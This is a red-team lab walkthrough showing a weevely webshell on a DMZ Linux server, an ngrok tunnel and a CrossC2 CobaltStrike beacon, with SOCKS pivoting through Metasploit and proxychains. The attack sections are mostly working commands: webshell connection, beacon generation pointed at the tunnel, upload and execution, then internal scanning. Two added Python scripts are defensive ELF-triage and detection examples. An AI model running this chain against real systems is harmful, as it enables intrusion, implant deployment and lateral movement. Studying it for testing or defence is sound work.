Red Teaming and Malware Analysis
Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux

Pivoting internally over DMZs using weevely + ngrok + CobaltStrike COMBO via a Linux machine

Last updated 4 years ago

In this lab we will see how a simple webshell can be used to deploy a CobaltStrike beacon on a Linux target placed in a DMZ, and how that machine can then be used as a pivot into the internal network. This is a common scenario in my red teaming assessments, for instance when I find a flaw that permits uploading a webshell to the web server. Let's do it.

Webshell - weevely

I use weevely often to deploy my webshell remotely. More information about this tool is available on its project page (linked under References).

weevely generate <password> <path>
weevely <URL> <password> [cmd]

Example of connecting to the target machine:

kali:> weevely http://target_system/evil.php my@password

[+] weevely 4.0.1

[+] Target:     target:/tmp
[+] Session:    /home/kali/.weevely/sessions/target/...
[+] Shell:      System shell

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> 
target:/tmp $ 

At this point we have a remote shell on the target server. Next we prepare ngrok and the CobaltStrike beacon, so that the beacon can reach our local listener and we can pivot into the internal network from our own machine.

ngrok

For this step you can use a trusted, internet-facing machine (e.g., an EC2 instance on AWS) or simply ngrok. ngrok exposes a server running on our localhost through any NAT or firewall, and masquerades our public IP address in the process.

We can use a configuration file as described in the ngrok documentation (linked under References), or simply run the following command to open a TCP tunnel that forwards to local port 8083:

./ngrok tcp 8083

Now it's time to create the CobaltStrike stager.

CrossC2

The CrossC2 framework allows us to generate cross-platform CobaltStrike payloads, e.g., Linux x64 and x86 beacons.

We create an x64 or x86 payload depending on the target system's architecture.

Tip: run uname -a on the target to check its kernel version and architecture.

The two placeholders in the commands below are:

  • ngrok_ip: the IP address the ngrok hostname resolves to.
  • ngrok_port: the port ngrok assigned to the tunnel.

./genCrossC2.Linux ngrok_ip ngrok_port .cobaltstrike.beacon_keys null Linux x86 ./cross
./genCrossC2.Linux ngrok_ip ngrok_port .cobaltstrike.beacon_keys null Linux x64 ./cross

The x64 payload was generated, and we can check it using the file command:

kali@kali:~/Desktop$ file cross
cross: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
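
The file output above shows two traits worth flagging during triage on the defender's side: the binary is statically linked and has no section header table, which is what a packed or custom-built loader stub looks like rather than a normally compiled program. The following Python script is an added example (not part of the original page or of the CrossC2 project) that parses ELF32/ELF64 little-endian headers and reports those two traits. The images it checks are constructed inside the script and are not real payloads; the field names follow the ELF specification.

```python
import struct

ELF_MAGIC = b"\x7fELF"
PT_DYNAMIC, PT_INTERP = 2, 3
ET_EXEC = 2

# Header and program-header layouts for ELF32 (class 1) and ELF64 (class 2),
# little-endian only, which is what the page's `file` output reports ("LSB").
_EHDR = {1: ("<16sHHIIIIIHHHHHH", 52), 2: ("<16sHHIQQQIHHHHHH", 64)}
_PHDR = {1: ("<IIIIIIII", 32), 2: ("<IIQQQQQQ", 56)}


def inspect_elf(data: bytes) -> dict:
    """Return static triage facts about an ELF image.

    Flags the two traits the `file` output reports for the payload:
    no section header table (e_shoff == 0 or e_shnum == 0) and static
    linking (no PT_INTERP and no PT_DYNAMIC program header).
    """
    if len(data) < 52 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF image")
    elf_class = data[4]                       # EI_CLASS: 1 = ELF32, 2 = ELF64
    if elf_class not in _EHDR or data[5] != 1:  # EI_DATA: 1 = little-endian
        raise ValueError("unsupported ELF class or byte order")

    fmt, size = _EHDR[elf_class]
    # Field order is the same for both classes once unpacked.
    (_ident, e_type, e_machine, _ver, _entry, e_phoff, e_shoff, _flags,
     _ehsize, e_phentsize, e_phnum, _shentsize, e_shnum, _shstrndx
     ) = struct.unpack(fmt, data[:size])

    pfmt, psize = _PHDR[elf_class]
    p_types = []
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + psize > len(data):
            break                             # truncated image: judge what we have
        p_types.append(struct.unpack(pfmt, data[off:off + psize])[0])  # p_type

    no_shdrs = e_shoff == 0 or e_shnum == 0
    static = PT_INTERP not in p_types and PT_DYNAMIC not in p_types
    findings = []
    if no_shdrs:
        findings.append("no section header table (stripped or packed loader output)")
    if static and e_type == ET_EXEC:
        findings.append("statically linked executable (no PT_INTERP/PT_DYNAMIC)")
    return {
        "bits": 32 if elf_class == 1 else 64,
        "machine": e_machine,                 # 0x3E = x86-64
        "no_section_headers": no_shdrs,
        "static": static,
        "findings": findings,
    }


def _build_elf64(with_shdrs: bool, dynamic: bool) -> bytes:
    """Constructed ELF64 image for the example (header + program headers only)."""
    phdrs = [(1, 5, 0, 0x400000, 0x400000, 0x1000, 0x1000, 0x1000)]   # PT_LOAD r-x
    if dynamic:
        phdrs.append((PT_INTERP, 4, 0x200, 0x400200, 0x400200, 0x1c, 0x1c, 1))
        phdrs.append((PT_DYNAMIC, 6, 0x300, 0x400300, 0x400300, 0x100, 0x100, 8))
    body = b"".join(struct.pack("<IIQQQQQQ", *p) for p in phdrs)
    e_shoff = 64 + len(body) if with_shdrs else 0
    e_shnum = 5 if with_shdrs else 0
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8
    ehdr = struct.pack("<16sHHIQQQIHHHHHH", ident, ET_EXEC, 0x3E, 1, 0x401000,
                       64, e_shoff, 0, 64, 56, len(phdrs), 64, e_shnum,
                       (e_shnum - 1) if with_shdrs else 0)
    return ehdr + body


# Constructed samples: one shaped like the payload above, one like a normal binary.
SAMPLE_STRIPPED = _build_elf64(with_shdrs=False, dynamic=False)
SAMPLE_NORMAL = _build_elf64(with_shdrs=True, dynamic=True)

if __name__ == "__main__":
    for name, img in (("stripped", SAMPLE_STRIPPED), ("normal", SAMPLE_NORMAL)):
        print(name, inspect_elf(img))
```

Neither trait is proof of anything on its own (busybox and Go binaries are also static, and some packers keep section headers), but a static, header-less ELF sitting in /tmp and owned by the web-server account is a combination worth a closer look.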

Now, it's time to upload it into the target Linux webserver using weevely:

target:/tmp $ :file_upload /home/kali/Desktop/cross /tmp/cross
True
target:/tmp $
target:/tmp $ chmod +x cross

Create CS Listener

The next step is to create the CS listener. We need to set:

  • HTTPS HOSTS: our internal IP address
  • HTTPS HOST (STAGER): our internal IP address
  • HTTPS PORT (C2): the local port (8083) to which the ngrok tunnel is mapped

After that, the payload can be executed from the weevely webshell:

./cross

And yeah, we got it.
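
From the defender's side, the sequence just described (a file dropped into /tmp by the web-server account, made executable, run from the webshell, then calling out to an external address) is a compact detection pattern. The following Python snippet is an added example, not from the original page, that runs two rules over a constructed key=value event stream: a web-server process executing a binary from a world-writable directory, and such a process then connecting to an address outside RFC1918 space. The field names (event, user, pid, ppid_exe, exe, dst), the paths and the addresses are assumptions made up for the example; 203.0.113.10 is a documentation address standing in for the ngrok endpoint.

```python
import ipaddress
import re

# Constructed key=value event stream for this example (not real telemetry).
# Map your own source (auditd execve/connect records, EDR process and network
# events) onto the same fields: event, user, pid, ppid_exe, exe, dst.
SAMPLE_EVENTS = """\
ts=1 event=exec user=www-data pid=4101 ppid_exe=/usr/sbin/apache2 exe=/usr/bin/id
ts=2 event=exec user=www-data pid=4102 ppid_exe=/usr/sbin/apache2 exe=/tmp/cross
ts=3 event=connect user=www-data pid=4102 exe=/tmp/cross dst=203.0.113.10:14833
ts=4 event=exec user=root pid=900 ppid_exe=/usr/lib/systemd/systemd exe=/usr/sbin/cron
ts=5 event=connect user=backup pid=1200 exe=/usr/bin/rsync dst=10.0.0.5:873
"""

# Accounts and parent binaries that identify "a web server spawned this".
WEB_USERS = {"www-data", "apache", "nginx", "http"}
WEB_SERVER_EXES = ("/usr/sbin/apache2", "/usr/sbin/httpd",
                   "/usr/sbin/nginx", "/usr/sbin/php-fpm")
# Directories a webshell can usually write to and execute from.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Address space that counts as "inside"; anything else is an egress candidate.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
KV = re.compile(r"(\w+)=(\S+)")


def parse_events(text: str) -> list[dict]:
    """Turn each non-empty 'k=v k=v ...' line into a dict."""
    return [dict(KV.findall(line)) for line in text.splitlines() if line.strip()]


def is_external(host: str) -> bool:
    """True when the destination lies outside the RFC1918/loopback ranges."""
    addr = ipaddress.ip_address(host)
    return not any(addr in net for net in INTERNAL_NETS)


def detect(events: list[dict]) -> list[str]:
    """Rule 1: a web-server child executes a binary from a world-writable dir.
    Rule 2: a process flagged by rule 1 connects to an external address."""
    alerts = []
    flagged_pids = set()
    for ev in events:
        pid = ev.get("pid")
        if ev.get("event") == "exec":
            from_writable = ev["exe"].startswith(WRITABLE_DIRS)
            web_spawned = (ev.get("ppid_exe", "").startswith(WEB_SERVER_EXES)
                           or ev.get("user") in WEB_USERS)
            if from_writable and web_spawned:
                flagged_pids.add(pid)
                alerts.append(f"ts={ev['ts']} rule1: web-server process ran "
                              f"{ev['exe']} from a world-writable directory")
        elif ev.get("event") == "connect" and pid in flagged_pids:
            host, _, port = ev["dst"].rpartition(":")
            if is_external(host):
                alerts.append(f"ts={ev['ts']} rule2: {ev['exe']} (pid {pid}) connected "
                              f"out to {host}:{port}, possible C2 beacon")
    return alerts


if __name__ == "__main__":
    for line in detect(parse_events(SAMPLE_EVENTS)):
        print(line)
```

Rule 1 alone is noisy on hosts whose deploy scripts unpack into /tmp; correlating it with rule 2 (the same pid leaving the internal address space shortly afterwards) is what makes the pair useful, and mounting /tmp with noexec removes the whole path in the first place.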

Pivoting using CS

In the next phase, we will:

  • Create a SOCKS4 proxy on the beacon
  • Use Metasploit or proxychains to pivot internally

Interacting with the new beacon offers the following options (screenshot in the original; the SOCKS commands were highlighted).

We can create the new SOCKS proxy from the CS console, or by clicking on the target machine in the GUI.

After clicking the "Launch" button, the SOCKS listener is opened on the local (attacker) machine. We can confirm it with the following command:

netstat -antp | grep "LISTEN"
(...)
tcp6       0      0 :::14833                :::*                    LISTEN

Metasploit for pivoting internally

Opening the "Proxy Pivots" menu gives us the command to pivot through MSF.

With that command, we start msfconsole, paste it to set up the new tunnel (a global Proxies setting), and scan the hosts reachable on the internal network:

msfconsole
setg Proxies socks4:10.0.2.15:14833
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.0.0/24
run

Take advantage of proxychains tool

To use proxychains, we first need to register the new SOCKS proxy in /etc/proxychains.conf: add the following entry to the [ProxyList] section at the end of the file, replacing the default one.

sudo vim /etc/proxychains.conf
socks4 10.0.2.15 14833

After that, we can use a lot of tools, such as crackmapexec, nmap, impacket-tools, and so on, by using the following combination:

proxychains nc 192.168.x.x 445 -v

Bonus

  • Creating a random CobaltStrike C2 profile: threatexpress/random_c2_profile (GitHub)
  • CobaltStrike Malleable C2 profiles: xx0hcd/Malleable-C2-Profiles (GitHub)

References

  • weevely (project page)
  • ngrok
  • CrossC2
  • Pivoting (Red Teaming and Malware Analysis, this site)
  • GitHub - threatexpress/random_c2_profile: Cobalt Strike random C2 Profile generator
  • GitHub - xx0hcd/Malleable-C2-Profiles: Cobalt Strike - Malleable C2 Profiles. A collection of profiles used in different projects using Cobalt Strike (https://www.cobaltstrike.com/)
  • HOWTO: Port Forwards through a SOCKS proxy - Cobalt Strike Research and Development
  • VulnStack domain environment lab penetration - Wh0ale's Blog